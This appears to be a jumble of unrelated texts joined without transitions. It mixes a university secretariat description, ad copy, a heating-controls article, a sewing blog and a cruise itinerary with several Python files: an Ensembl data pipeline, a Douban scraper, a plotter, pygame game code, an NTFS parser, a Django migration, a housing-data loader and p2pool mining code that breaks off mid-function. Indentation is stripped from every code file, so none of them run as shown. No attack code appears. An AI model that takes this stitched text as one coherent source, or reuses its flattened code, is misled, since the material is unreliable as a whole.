The Academic Secretariat assists the Rector in implementing his policies, the decisions of the Senate and those of university committees.
The Senate Department – dealing with the academic committees of the Senate.
Academic Staff Department – appointments and promotions of academic staff, matters of academic administration.
Research Students Department – scholarships for advanced degrees, and the administrative affairs of research and post-doctoral students.
Foundations and Scholarships Department – handling internal and external scholarships and foundation grants.
Disciplinary committees for students and staff.
Drafting the university's academic rules and protocols and overseeing changes and updates.
#
# Author : Manuel Bernal Llinares
# Project : trackhub-creator
# Timestamp : 26-07-2017 12:29
# ---
# © 2017 Manuel Bernal Llinares <mbdebian@gmail.com>
# All rights reserved.
#
"""
This pipeline collects data from Ensembl to avoid race conditions when running other pipelines that use this data
"""
import os
import time
# Application imports
import config_manager
import ensembl
from pipelines.template_pipeline import DirectorConfigurationManager, Director
__configuration_file = None
__pipeline_arguments = None
__pipeline_director = None
def set_configuration_file(config_file):
global __configuration_file
if __configuration_file is None:
__configuration_file = config_file
return __configuration_file
def set_pipeline_arguments(pipeline_arguments):
global __pipeline_arguments
if __pipeline_arguments is None:
__pipeline_arguments = pipeline_arguments
return __pipeline_arguments
def get_pipeline_director():
global __pipeline_director
if __pipeline_director is None:
__pipeline_director = EnsemblDataCollector(config_manager.read_config_from_file(__configuration_file),
__configuration_file,
__pipeline_arguments)
return __pipeline_director
class ConfigManager(DirectorConfigurationManager):
_CONFIG_OBJECT_KEY_NCBI_TAXONOMY_IDS = 'ncbi_taxonomy_ids'
def __init__(self, configuration_object, configuration_file, pipeline_arguments):
super(ConfigManager, self).__init__(configuration_object, configuration_file, pipeline_arguments)
self.__pipeline_arguments_object = None
def _process_pipeline_arguments(self):
# Pipeline arguments for this pipeline are like: "ncbi_taxonomy_ids=id,id,id"
id_list = []
if self._get_pipeline_arguments():
id_list = self._get_pipeline_arguments().split('=')[1].split(',')
return {
self._CONFIG_OBJECT_KEY_NCBI_TAXONOMY_IDS: id_list
}
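        # Example (assumed input format): pipeline arguments of
        #   "ncbi_taxonomy_ids=9606,10090"
        # would yield {'ncbi_taxonomy_ids': ['9606', '10090']}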
def get_ncbi_taxonomy_ids(self):
return self._get_pipeline_arguments_object()[self._CONFIG_OBJECT_KEY_NCBI_TAXONOMY_IDS]
class EnsemblDataCollector(Director):
"""
This pipeline collects data from the latest Ensembl release for the given taxonomies
"""
def __init__(self, configuration_object, configuration_file, pipeline_arguments):
runner_id = "{}-{}".format(__name__, time.time())
super(EnsemblDataCollector, self).__init__(runner_id)
self.__config_manager = ConfigManager(configuration_object, configuration_file, pipeline_arguments)
def _get_configuration_manager(self):
return self.__config_manager
def __check_downloaded_files(self, files_names_and_paths):
result = True
for file_name, file_path in files_names_and_paths:
if not os.path.exists(file_path):
result = False
self._get_logger().error("MISSING ENSEMBL file '{}' at '{}'".format(file_name, file_path))
return result
def _run_pipeline(self):
# TODO - I can easily parallelize this using the parallel module
# Main pipeline algorithm
self._get_logger().info("[START]---> Pipeline run")
self._get_logger().info("Collecting Ensembl data for NCBI Taxonomies: {}"
.format(",".join(self._get_configuration_manager().get_ncbi_taxonomy_ids())))
ensembl_downloader_service = ensembl.data_downloader.get_data_download_service()
for ncbi_taxonomy_id in self._get_configuration_manager().get_ncbi_taxonomy_ids():
downloaded_protein_sequences = ensembl_downloader_service \
.get_protein_sequences_for_species(ncbi_taxonomy_id)
downloaded_gtf_files = ensembl_downloader_service \
.get_genome_reference_for_species(ncbi_taxonomy_id)
if not downloaded_protein_sequences:
self._get_logger().error("MISSING protein sequence data for taxonomy ID #{}".format(ncbi_taxonomy_id))
else:
self.__check_downloaded_files(downloaded_protein_sequences)
if not downloaded_gtf_files:
self._get_logger().error("MISSING genome reference data for taxonomy ID #{}".format(ncbi_taxonomy_id))
else:
self.__check_downloaded_files(downloaded_gtf_files)
return True
if __name__ == '__main__':
print("ERROR: This script is part of a pipeline collection and it is not meant to be run in stand alone mode")
Bradford packages more than just industrial parts. We also protect a multitude of products found in your home; from food products and liquids to cosmetics and pharmaceuticals. Whether our partitions package the container (plastic or glass) or come in direct contact with the product we know that each product has its own unique protection and aesthetic requirements. We have the creativity and the materials to meet your needs. The brands you know and trust rely on us – you can, too!
# -*- coding: utf-8 -*-
from scrapy.spider import Spider
from scrapy.selector import Selector
from moviespider.items import Cili006Item
from moviespider.moviedb import MovieDB
import scrapy
class DoubanSearch2Spider(Spider):
moviedb = MovieDB()
name = "doubanmovie"
allowed_domains = ["douban.com"]
def start_requests(self):
lst = self.moviedb.getDoubanID_douban()
lstreq = []
for cur in lst:
req = scrapy.FormRequest("http://movie.douban.com/subject/%d/" % (cur[0]), callback=self.search_parse)
req.__setattr__('doubanid', cur[0])
lstreq.append(req)
#break
return lstreq
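    # Note (illustrative alternative): Scrapy's usual channel for per-request
    # data is the Request.meta dict, e.g.
    #     scrapy.Request(url, meta={'doubanid': cur[0]}, callback=self.search_parse)
    # with response.meta['doubanid'] read back in the callback.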
def search_parse(self, response):
sel = Selector(response)
print 'myparam is %d' % (response.request.doubanid)
title = sel.css('title')[0].xpath('./text()')[0].extract().strip()
print 'title is ' + title
photo = sel.css('a.nbgnbg')[0]
imgurl = photo.xpath('./img/@src')[0].extract()
arr1 = imgurl.split('/')
print 'img is ' + arr1[len(arr1) - 1]
self.moviedb.updMovie_doubanmovie(response.request.doubanid, title, arr1[len(arr1) - 1])
arrinfo = sel.css('div#info')
for curinfo in arrinfo:
print 'info is ' + curinfo.extract()
            bi = curinfo.extract().find(u'>又名:</span>')
if bi > 0:
tstr = curinfo.extract()[bi + len(u'>又名:</span>'):]
ei = tstr.find('<br>')
                tstr1 = tstr[0:ei].strip()
                print 'other name is ' + tstr1
                tarr1 = tstr1.split('/')
for t1 in tarr1:
t1 = t1.strip()
print 't1 is ' + t1
self.moviedb.addMovieName_doubanmovie(response.request.doubanid, t1)
break
        return []
Come stay in our beautiful, historic home in Midtown! You'll have the entire 3rd floor to yourself, with your own private entrance, full kitchen, bathroom, and living room. We're meticulously clean, and we've thought of everything so you don't have to.
from pyqtgraph.Qt import QtGui, QtCore
import pyqtgraph as pg
import collections
import random
import time
import math
import numpy as np
class DynamicPlotter():
def __init__(self, sampleinterval=0.1, timewindow=10., size=(600,350)):
# Data stuff
self._interval = int(sampleinterval*1000)
print(self._interval)
self._bufsize = int(timewindow/sampleinterval)
print(self._bufsize)
self.databuffer = collections.deque([0.0]*self._bufsize, self._bufsize)
self.x = np.linspace(-timewindow, 0.0, self._bufsize)
        self.y = np.zeros(self._bufsize, dtype=float)  # the np.float alias was removed in NumPy 1.24; use builtin float
# PyQtGraph stuff
self.app = QtGui.QApplication([])
self.plt = pg.plot(title='Dynamic Plotting with PyQtGraph')
self.plt.resize(*size)
self.plt.showGrid(x=True, y=True)
self.plt.setLabel('left', 'amplitude', 'V')
self.plt.setLabel('bottom', 'time', 's')
self.curve = self.plt.plot(self.x, self.y, pen=(255,0,0))
# QTimer
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.updateplot)
self.timer.start(self._interval)
def getdata(self):
frequency = 0.5
noise = random.normalvariate(0., 1.)
new = 10.*math.sin(time.time()*frequency*2*math.pi) + noise
return new
def updateplot(self):
self.databuffer.append( self.getdata() )
self.y[:] = self.databuffer
self.curve.setData(self.x, self.y)
self.app.processEvents()
def run(self):
self.app.exec_()
if __name__ == '__main__':
m = DynamicPlotter(sampleinterval=0.05, timewindow=10.)
m.run()
Blackrock posted on a forum discussion.
Forum Topic: Is Theresa May the Worst British Prime Minister of all time ?
Forum Topic: What will be your new favourite European country after Brexit?
#
# Copyright (c) 2009 Mason Green & Tom Novelli
#
# This file is part of OpenMelee.
#
# OpenMelee is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# any later version.
#
# OpenMelee is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with OpenMelee. If not, see <http://www.gnu.org/licenses/>.
#
import os
import pygame
import players.kbd_sdl as kbd
from utils import transform
BLACK = 0, 0, 0, 0
WHITE = 255,255,255
class Window:
"A Pygame/SDL interface in the style of Pyglet"
backend = 'sdl'
def __init__(self):
# Initialize Pygame/SDL
os.environ['SDL_VIDEO_WINDOW_POS'] = self.WINDOW_POSITION
pygame.init()
self.screen = pygame.display.set_mode((self.sizeX, self.sizeY))
'''
if sys.hexversion >= 0x2060000:
import warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
# Next statement gives this warning... no big deal...
# sysfont.py:139: DeprecationWarning: os.popen3 is deprecated. Use the subprocess module.
self.font = pygame.font.SysFont("", 24)
'''
self.font = pygame.font.SysFont("", 24)
print "Pygame (SDL) backend"
print " Timer resolution: %dms" % pygame.TIMER_RESOLUTION
try:
print " Using %s smoothscale backend." % pygame.transform.get_smoothscale_backend()
except AttributeError:
pass
transform.set_screen(self.screen)
self.clock = pygame.time.Clock()
def set_caption(self, caption):
pygame.display.set_caption(caption)
def get_time_ms(self):
return pygame.time.get_ticks()
def on_draw(self):
self.screen.fill(BLACK)
view = self.calculate_view()
zoom, view_center = view
transform.set_view(view)
# Display debug info
if self.net:
s = "player=%d rtt=%s tdiff=%s" % (
self.local_player,
self.net.rtt_avg,
self.net.tdiff_avg,
)
surf = self.font.render(s, False, WHITE)
self.screen.blit(surf, (0,20))
s = "fps=%3d zoom=%3.3f center=%5d,%5d" % (
self.clock.get_fps(),
zoom,
view_center[0], view_center[1],
)
surf = self.font.render(s, False, WHITE)
self.screen.blit(surf, (0,0))
# Common to SDL and GL renderers:
self.planet.draw(self.screen, view)
for s in self.actors:
if s:
s.draw(self.screen, view)
# Draw lines between objects (DEBUG)
'''
a = transform.to_sdl(self.planet.body.position)
for ship in self.actors:
b = transform.to_sdl(ship.body.position)
pygame.draw.line(self.screen, (0,0,255), a, b)
'''
# Draw world bounding box
c = 90, 230, 230
ub = self.aabb.upper_bound
lb = self.aabb.lower_bound
x1,y1 = transform.to_sdl((lb.x, lb.y))
x2,y2 = transform.to_sdl((ub.x, ub.y))
pygame.draw.rect(self.screen, c, pygame.Rect(x1, y1, x2-x1, y2-y1), 2)
# End of frame
pygame.display.update()
self.clock.tick(self.frame_rate)
def mainloop(self):
while 1:
if kbd.process_events(self):
return
if self.net:
self.net.process_events(self)
self.update()
self.on_draw()
Additional standards for heating controls come into effect this year and installers need to be prepared for their introduction, says Colin Timmins.
The coming year should see some significant changes to the heating controls that are installed when replacing a boiler. While most installers recognise the benefits that controls bring to their customers by ensuring the long-term delivery of better comfort and lower running costs, it is also realistic to recognise that many installations are carried out under cost pressure, which can often result in only the minimum standards being adopted.
It is therefore encouraging that the government has been reviewing the minimum standards that are currently in place under Part L of the Building Regulations and that moves are afoot to strengthen these requirements.
Following the publication of the Heat in Buildings consultation response last October, the UK government published amendments to the 2013 Domestic Building Services Compliance Guide that will come into force on 6 April 2018.
One of the key changes is that the compliance guide now states that “when replacing a boiler, the boiler controls are considered to be a part of the boiler installation and should therefore meet the standards set out in the relevant sections of this document”.
This is a small but very significant change, as previously it stated that only the component being replaced (i.e. the new boiler) would have to comply with the guidance.
Installers will now have to ensure that the system meets minimum standards for boiler interlock, time and temperature control, as they would for a new system. This was generally accepted as a requirement by industry and building control in the current Building Regulations, but it is good that this is now more clearly stated.
Smart thermostat with automation and optimisation.
It is likely that the additional options above could lead to some head scratching, given that none of them are currently widely applied in UK homes.
Of course this is to be expected as government is trying to encourage new technologies, but BEAMA will be working to provide guidance to help installers select and install the right solutions and, importantly, to make sure that the use of these technologies leads to greater energy efficiency.
One piece of work currently underway is a cross-industry review of definitions to make sure there is sufficient clarity for specifiers, installers and market surveillance authorities, ready for when these requirements come into force.
BEAMA will of course be updating its practical guide for complying with these regulations by April.
One of the concerns that BEAMA had with the Heat in Buildings consultation response was that, while it highlighted the importance of thermostatic radiator valves (TRVs), it fell short of mandating these as a requirement (rather than just ‘good practice’ as currently) when boilers are replaced.
This could be about to change though, as just before Christmas there was agreement in Europe on the revision of the Energy Performance of Buildings Directive.
The agreed text includes new requirements for individual room temperature controls, such as TRVs, to be installed both in new buildings and when boilers are replaced in existing properties.
# -*- coding: utf-8 -*-
from rawdisk.util.rawstruct import RawStruct
from .headers import BIOS_PARAMETER_BLOCK, EXTENDED_BIOS_PARAMETER_BLOCK
class BootSector(RawStruct):
"""Represents NTFS Bootsector
Attributes:
oem_id (8 byte string): NTFS filesystem signature 'NTFS '
bpb (Bpb): Initialized :class:`~.bpb.Bpb` object.
mft_offset (int): Offset to MFT table from the start of \
NTFS volume in bytes
See More:
http://ntfs.com/ntfs-partition-boot-sector.htm
"""
def __init__(self, data=None, offset=None, length=None, filename=None):
RawStruct.__init__(
self,
data=data,
offset=offset,
length=length,
filename=filename
)
self.oem_id = self.get_string(3, 8)
self.bpb = BIOS_PARAMETER_BLOCK(
self.get_ushort_le(0x0B), # bytes_per_sector
self.get_ubyte(0x0D), # sectors_per_cluster
self.get_ushort_le(0x0E), # reserved_sectors
self.get_ubyte(0x15), # media_type
self.get_ushort_le(0x18), # sectors_per_track
self.get_ushort_le(0x1A), # heads
self.get_uint_le(0x1C), # hidden_sectors
self.get_ulonglong_le(0x28), # total sectors
)
self.extended_bpb = EXTENDED_BIOS_PARAMETER_BLOCK(
self.get_ulonglong_le(0x30), # mft_cluster
self.get_ulonglong_le(0x38), # mft_mirror_cluster
self.get_byte(0x40), # clusters_per_mft
self.get_ubyte(0x44), # clusters_per_index
self.get_ulonglong_le(0x48), # volume_serial
)
@property
def mft_record_size(self):
"""
Returns:
int: MFT record size in bytes
"""
        if self.extended_bpb.clusters_per_mft < 0:
            # negative values encode the record size directly as 2**|n| bytes
            return 2 ** abs(self.extended_bpb.clusters_per_mft)
        else:
            return self.extended_bpb.clusters_per_mft * \
                self.bpb.sectors_per_cluster * self.bpb.bytes_per_sector
@property
def mft_offset(self):
"""
Returns:
int: MFT Table offset from the beginning of the partition in bytes
"""
return self.bpb.bytes_per_sector * \
self.bpb.sectors_per_cluster * self.extended_bpb.mft_cluster
@property
def mft_mirror_offset(self):
"""
Returns:
int: Mirror MFT Table offset from the beginning of the partition \
in bytes
"""
return self.bpb.bytes_per_sector * \
self.bpb.sectors_per_cluster * self.extended_bpb.mft_mirror_cluster
@property
def total_clusters(self):
return int(self.bpb.total_sectors / self.bpb.sectors_per_cluster)
@property
def bytes_per_cluster(self):
return self.bpb.sectors_per_cluster * self.bpb.bytes_per_sector
@property
def volume_size(self):
"""Returns volume size in bytes"""
return self.bpb.bytes_per_sector * self.bpb.total_sectors
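# A usage sketch (assumptions: a raw NTFS volume image named 'ntfs.img' and a
# standard 512-byte boot sector; the keyword arguments mirror __init__ above):
#
#     bs = BootSector(filename='ntfs.img', offset=0, length=512)
#     print(bs.oem_id)      # expect 'NTFS    ' on a valid volume
#     print(bs.mft_offset)  # byte offset of the MFT within the volume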
Christmas sewing- lots of firsts!
Have you ever sewed something (or made something if you don’t sew) that had so many new parts to it that it was super intimidating? I totally just rewrote that sentence so I didn’t have to use the word “sewer”. I was listening to a podcast about sewing the other day and they were talking…
It’s no secret that I’m somewhat obsessed with Project Runway. Well, at least the three seasons that Netflix has deemed worthy of bestowing upon me. I may (or may not) check at the beginning of every month to see if the Netflix gods are smiling on me, giving me a new season to binge watch…
I finally did a sew-a-long!
I had heard of people doing sew-a-longs before, but I had never done one. Well, okay, there was the summer sampler quilt thing I did last summer, but I was always a week or more behind, so I don’t know if that counts. Also, I never finished the quilt. So there’s that. This last week…
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('imager_images', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='imageralbum',
name='published',
field=models.CharField(default=b'public', max_length=7, choices=[(b'public', b'Public'), (b'private', b'Private'), (b'shared', b'Shared')]),
preserve_default=True,
),
migrations.AlterField(
model_name='imageralbum',
name='title',
field=models.CharField(default=b'MyAlbum', max_length=63),
preserve_default=True,
),
migrations.AlterField(
model_name='imagerphoto',
name='description',
field=models.TextField(blank=True),
preserve_default=True,
),
migrations.AlterField(
model_name='imagerphoto',
name='published',
field=models.CharField(default=b'public', max_length=31, choices=[(b'public', b'Public'), (b'private', b'Private'), (b'shared', b'Shared')]),
preserve_default=True,
),
migrations.AlterField(
model_name='imagerphoto',
name='title',
field=models.CharField(default=b'MyPhoto', max_length=31),
preserve_default=True,
),
]
The Imperial Junk, traditional sailboat built of wood with modern facilities and first class service, is perfect for exploring Halong Bay on Imperial Cruise.
12:30 – On arrival at pier, you will board your Imperial Cruise and you are warmly welcomed by professional and friendly crew. Check into cabin.
13:00 – Enjoy a specially prepared lunch while cruising through the most beautiful parts of the magical Bay, with thousands of amazing limestone islands emerging from the emerald water. The Imperial Cruise sails a very tranquil route, zigzagging through hundreds of islands to the quietest parts of the Bay, where you won’t find another boat, so you can explore the exotic beauty of the legendary Bay and feel as if you were in paradise.
16:00 – Kayaking for an hour or more beneath sheer rock cliffs.
17:00 – Swimming time: a great chance to relax in the water, jumping, diving, and trying a back flip or somersault.
20:30 – Time to choose your own way to relax after dinner: watching movies or listening to Vietnamese traditional music. Board games and squid fishing are also available for evening entertainment.
12:00 – Lunch in the restaurant at the bungalow – Catba Sandy Beach.
17:00 – Back to your Imperial Classic Cruise to refresh, relax, and make friends with a new group.
'''
make_projects_table.py
----------------------
This file creates the projects table in the database, which is sent to
the front-end via /api/projects/. It depends on the following data sources:
- Projects.csv, From the Preservation Catalog Folder in the s3
- 'Affordable Housing Data': Updated regularly from open data DC
- Master Adress Repository
Projects that are not from the preservation catalog have an nlihc_id
beginning with "AH" for affordable housing.
'''
from . import utils
from . import wmata
import requests
import numpy as np
import pandas as pd
import geopandas as gp
preservation_catalog_columns = [
'nlihc_id',
'latitude',
'longitude',
'census_tract',
'neighborhood_cluster',
'ward',
'neighborhood_cluster_desc',
# Basic Project Information',
'proj_name',
'proj_addre',
'proj_units_tot',
'proj_address_id',
'proj_units_assist_max',
'proj_owner_type',
'most_recent_reac_score_num',
'most_recent_reac_score_date',
]
def load_preservation_catalog_projects():
'''
Loads the raw data from the preservation catalog.
It is located in 'preservation_catalog' on the S3.
'''
df = pd.read_csv(utils.S3+'preservation_catalog/Project.csv')
df.columns = df.columns.str.lower()
df = utils.get_census_tract_for_data(df, 'proj_lon', 'proj_lat')
df['neighborhood_cluster'] = utils.just_digits(df.cluster_tr2000)
df['ward'] = utils.just_digits(df.ward2012)
df = df.merge(load_reac_data(), how='left')
return df.rename(columns={'proj_lat': 'latitude',
'proj_lon': 'longitude',
'tract': 'census_tract',
'date': 'most_recent_reac_score_date',
'reac_score_num': 'most_recent_reac_score_num',
'cluster_tr2000_name': 'neighborhood_cluster_desc',
})[preservation_catalog_columns]
def load_affordable_housing_projects():
'''Loads and transforms the "Affordabe Housing" raw data from opendata.dc'''
columns = {
'ADDRESS_ID': 'proj_address_id',
'FULLADDRESS': 'proj_addre',
'MAR_WARD': 'ward',
'PROJECT_NAME': 'proj_name',
'TOTAL_AFFORDABLE_UNITS': 'proj_units_tot',
'LATITUDE': 'latitude',
'LONGITUDE': 'longitude',
'tract': 'census_tract',
}
url = utils.get_paths_for_data('affordable_housing', years=utils.get_years())[0]
df = pd.read_csv(url)
df['MAR_WARD'] = utils.just_digits(df['MAR_WARD'])
df = utils.get_census_tract_for_data(df, 'LONGITUDE','LATITUDE')
df = df.rename(columns=columns)[columns.values()]
df = utils.get_cluster_for_data(df, 'longitude', 'latitude')
df['nlihc_id'] = pd.Series(df.index).astype(str).apply(lambda s: 'AH' + s.zfill(6))
return df[['nlihc_id', 'neighborhood_cluster']+ list(columns.values())]
def load_mar_projects():
    '''Loads and transforms the "Address Points" raw data from opendata.dc'''
url = utils.get_paths_for_data('mar', years=utils.get_years())[0]
df = pd.read_csv(url)
df = df[['ADDRESS_ID', 'ACTIVE_RES_UNIT_COUNT', 'SSL', 'CLUSTER_']]
df.columns = ['proj_address_id', 'active_res_unit_count', 'ssl', 'neighborhood_cluster']
return df
def load_tax():
'''Adds the Project Taxable Value attribute to the data.'''
# Tax Data. Seems to update every year.
r = requests.get(
'https://maps2.dcgis.dc.gov/dcgis/rest/services/DCGIS_DATA/Property_and_Land_WebMercator/MapServer/53/query?where=1%3D1&outFields=SSL,ASSESSMENT&returnGeometry=false&outSR=4326&f=json'
)
data = r.json()['features']
return {r['attributes']['SSL']: r['attributes']['ASSESSMENT'] for r in data}
def load_topa():
'''
This function loads the raw TOPA data, grabs the most recent date for
each address id, and counts the number of TOPA notices for each address id.
    It returns a dataframe where the observations are an address id, the most
    recent TOPA notice date, and the number of TOPA notices.
'''
df = pd.read_csv(utils.S3+'topa/Rcasd_current.csv')
df.columns = df.columns.str.lower()
df['most_recent_topa_date'] = pd.to_datetime(df['notice_date'])
return pd.concat([
# The most recent topa data.
(df.sort_values('most_recent_topa_date', ascending=False)
.groupby('address_id').first()['most_recent_topa_date']),
# Number of observations per address id.
df.address_id.value_counts()
], axis=1).reset_index().rename(columns={
# Fixing column names
'address_id': 'topa_count', 'index': 'proj_address_id'})
def load_reac_data():
'''Gets REAC information from the s3.'''
df = pd.read_csv(utils.S3+'preservation_catalog/Reac_score.csv')
df.columns = df.columns.str.lower()
df['date'] = pd.to_datetime(df['reac_date'])
df = df.sort_values('date', ascending=False).groupby('nlihc_id').first()
return df[['date', 'reac_score_num']].reset_index()
def load_project_data(engine):
'''With the addition of MAR - this takes a long time (a few minutes).'''
print("Starting load")
df = pd.concat([load_preservation_catalog_projects(),
load_affordable_housing_projects()], sort=True)
df = df.sort_values('nlihc_id').drop_duplicates('proj_address_id')
df = add_mar_and_tax(df)
df = add_neighborhoods(df)
df = df.merge(load_topa(), on='proj_address_id', how='left')
bus = wmata.add_bus_stops(df[['nlihc_id', 'longitude', 'latitude']],
'longitude', 'latitude')
df = df.merge(bus, how='left')
return utils.write_table(df, 'new_project', engine)
def add_mar_and_tax(df):
print("Adding mar and tax")
df = df.merge(load_mar_projects(), on='proj_address_id', how='left')
df['sum_appraised_value_current_total'] = df['ssl'].map(load_tax())
return df
def add_neighborhoods(df):
print("Adding neighborhoods")
# Fix neighborhood Cluster Info
df['neighborhood_cluster_x'] = utils.just_digits(df.neighborhood_cluster_x)
df['neighborhood_cluster_y'] = utils.just_digits(df.neighborhood_cluster_y)
df['neighborhood_cluster'] = df.apply(lambda row: max(
row.neighborhood_cluster_x, row.neighborhood_cluster_y), axis=1)
return df.drop(columns=['neighborhood_cluster_x', 'neighborhood_cluster_y'])
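
# A minimal usage sketch (assuming utils.write_table accepts a SQLAlchemy
# engine; the connection string below is hypothetical):
if __name__ == '__main__':
    from sqlalchemy import create_engine
    engine = create_engine('postgresql://user:password@localhost:5432/housing')
    load_project_data(engine)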
|
"I provide innovative strategies to help clients reach their intellectual property goals."
Wes works with clients to protect, enforce, and leverage their intellectual property rights. Drawing on prosecution and litigation experience in both patent and trademark matters, Wes provides clients with forward-looking, efficient IP strategies that help develop and protect their businesses.
Prior to joining Brinks, Wes clerked with Brannon Sowers & Cracraft in Indianapolis, IN. He worked on patents directed to various technologies, including pharmaceuticals, automotive, social networking, mobile applications, medical devices, and mechanical devices. Wes also worked on patent and trademark litigation.
Before practicing law, Wes worked as a data analyst for Delphi Automotive, conducting research and development on automobile safety systems and lane and traffic-sign recognition technologies. |
from __future__ import division
import base64
import random
import sys
import time
from twisted.internet import defer
from twisted.python import log
import bitcoin.getwork as bitcoin_getwork, bitcoin.data as bitcoin_data
from bitcoin import helper, script, worker_interface
from util import forest, jsonrpc, variable, deferral, math, pack
import p2pool, p2pool.data as p2pool_data
class WorkerBridge(worker_interface.WorkerBridge):
def __init__(self, node, my_pubkey_hash, donation_percentage, merged_urls, worker_fee):
worker_interface.WorkerBridge.__init__(self)
self.recent_shares_ts_work = []
self.node = node
self.my_pubkey_hash = my_pubkey_hash
self.donation_percentage = donation_percentage
self.worker_fee = worker_fee
self.running = True
self.pseudoshare_received = variable.Event()
self.share_received = variable.Event()
self.local_rate_monitor = math.RateMonitor(10*60)
self.removed_unstales_var = variable.Variable((0, 0, 0))
self.removed_doa_unstales_var = variable.Variable(0)
self.my_share_hashes = set()
self.my_doa_share_hashes = set()
self.tracker_view = forest.TrackerView(self.node.tracker, forest.get_attributedelta_type(dict(forest.AttributeDelta.attrs,
my_count=lambda share: 1 if share.hash in self.my_share_hashes else 0,
my_doa_count=lambda share: 1 if share.hash in self.my_doa_share_hashes else 0,
my_orphan_announce_count=lambda share: 1 if share.hash in self.my_share_hashes and share.share_data['stale_info'] == 'orphan' else 0,
my_dead_announce_count=lambda share: 1 if share.hash in self.my_share_hashes and share.share_data['stale_info'] == 'doa' else 0,
)))
@self.node.tracker.verified.removed.watch
def _(share):
if share.hash in self.my_share_hashes and self.node.tracker.is_child_of(share.hash, self.node.best_share_var.value):
assert share.share_data['stale_info'] in [None, 'orphan', 'doa'] # we made these shares in this instance
self.removed_unstales_var.set((
self.removed_unstales_var.value[0] + 1,
self.removed_unstales_var.value[1] + (1 if share.share_data['stale_info'] == 'orphan' else 0),
self.removed_unstales_var.value[2] + (1 if share.share_data['stale_info'] == 'doa' else 0),
))
if share.hash in self.my_doa_share_hashes and self.node.tracker.is_child_of(share.hash, self.node.best_share_var.value):
self.removed_doa_unstales_var.set(self.removed_doa_unstales_var.value + 1)
# MERGED WORK
self.merged_work = variable.Variable({})
@defer.inlineCallbacks
def set_merged_work(merged_url, merged_userpass):
merged_proxy = jsonrpc.Proxy(merged_url, dict(Authorization='Basic ' + base64.b64encode(merged_userpass)))
while self.running:
auxblock = yield deferral.retry('Error while calling merged getauxblock:', 30)(merged_proxy.rpc_getauxblock)()
self.merged_work.set(dict(self.merged_work.value, **{auxblock['chainid']: dict(
hash=int(auxblock['hash'], 16),
target='p2pool' if auxblock['target'] == 'p2pool' else pack.IntType(256).unpack(auxblock['target'].decode('hex')),
merged_proxy=merged_proxy,
)}))
yield deferral.sleep(1)
for merged_url, merged_userpass in merged_urls:
set_merged_work(merged_url, merged_userpass)
@self.merged_work.changed.watch
def _(new_merged_work):
print 'Got new merged mining work!'
# COMBINE WORK
self.current_work = variable.Variable(None)
def compute_work():
t = self.node.bitcoind_work.value
bb = self.node.best_block_header.value
if bb is not None and bb['previous_block'] == t['previous_block'] and self.node.net.PARENT.POW_FUNC(bitcoin_data.block_header_type.pack(bb)) <= t['bits'].target:
print 'Skipping from block %x to block %x!' % (bb['previous_block'],
bitcoin_data.hash256(bitcoin_data.block_header_type.pack(bb)))
t = dict(
version=bb['version'],
previous_block=bitcoin_data.hash256(bitcoin_data.block_header_type.pack(bb)),
bits=bb['bits'], # not always true
coinbaseflags='',
height=t['height'] + 1,
time=bb['timestamp'] + 600, # better way?
transactions=[],
transaction_fees=[],
merkle_link=bitcoin_data.calculate_merkle_link([None], 0),
subsidy=self.node.net.PARENT.SUBSIDY_FUNC(self.node.bitcoind_work.value['height']),
last_update=self.node.bitcoind_work.value['last_update'],
)
self.current_work.set(t)
self.node.bitcoind_work.changed.watch(lambda _: compute_work())
self.node.best_block_header.changed.watch(lambda _: compute_work())
compute_work()
self.new_work_event = variable.Event()
@self.current_work.transitioned.watch
def _(before, after):
# trigger LP if version/previous_block/bits changed or transactions changed from nothing
if any(before[x] != after[x] for x in ['version', 'previous_block', 'bits']) or (not before['transactions'] and after['transactions']):
self.new_work_event.happened()
self.merged_work.changed.watch(lambda _: self.new_work_event.happened())
self.node.best_share_var.changed.watch(lambda _: self.new_work_event.happened())
def stop(self):
self.running = False
def get_stale_counts(self):
'''Returns (orphans, doas), total, (orphans_recorded_in_chain, doas_recorded_in_chain)'''
my_shares = len(self.my_share_hashes)
my_doa_shares = len(self.my_doa_share_hashes)
delta = self.tracker_view.get_delta_to_last(self.node.best_share_var.value)
my_shares_in_chain = delta.my_count + self.removed_unstales_var.value[0]
my_doa_shares_in_chain = delta.my_doa_count + self.removed_doa_unstales_var.value
orphans_recorded_in_chain = delta.my_orphan_announce_count + self.removed_unstales_var.value[1]
doas_recorded_in_chain = delta.my_dead_announce_count + self.removed_unstales_var.value[2]
my_shares_not_in_chain = my_shares - my_shares_in_chain
my_doa_shares_not_in_chain = my_doa_shares - my_doa_shares_in_chain
return (my_shares_not_in_chain - my_doa_shares_not_in_chain, my_doa_shares_not_in_chain), my_shares, (orphans_recorded_in_chain, doas_recorded_in_chain)
def get_user_details(self, request):
user = request.getUser() if request.getUser() is not None else ''
desired_pseudoshare_target = None
if '+' in user:
user, desired_pseudoshare_difficulty_str = user.rsplit('+', 1)
try:
desired_pseudoshare_target = bitcoin_data.difficulty_to_target(float(desired_pseudoshare_difficulty_str))
except:
pass
desired_share_target = 2**256 - 1
if '/' in user:
user, min_diff_str = user.rsplit('/', 1)
try:
desired_share_target = bitcoin_data.difficulty_to_target(float(min_diff_str))
except:
pass
if random.uniform(0, 100) < self.worker_fee:
pubkey_hash = self.my_pubkey_hash
else:
try:
pubkey_hash = bitcoin_data.address_to_pubkey_hash(user, self.node.net.PARENT)
except: # XXX blah
pubkey_hash = self.my_pubkey_hash
return user, pubkey_hash, desired_share_target, desired_pseudoshare_target
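    # Worker-name suffix format accepted above (the address and numbers are
    # illustrative): "ADDRESS/500" requests a minimum share difficulty of 500,
    # "ADDRESS+0.01" requests a pseudoshare difficulty of 0.01, and the two
    # can be combined as "ADDRESS/500+0.01".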
def preprocess_request(self, request):
user, pubkey_hash, desired_share_target, desired_pseudoshare_target = self.get_user_details(request)
return pubkey_hash, desired_share_target, desired_pseudoshare_target
def get_work(self, pubkey_hash, desired_share_target, desired_pseudoshare_target):
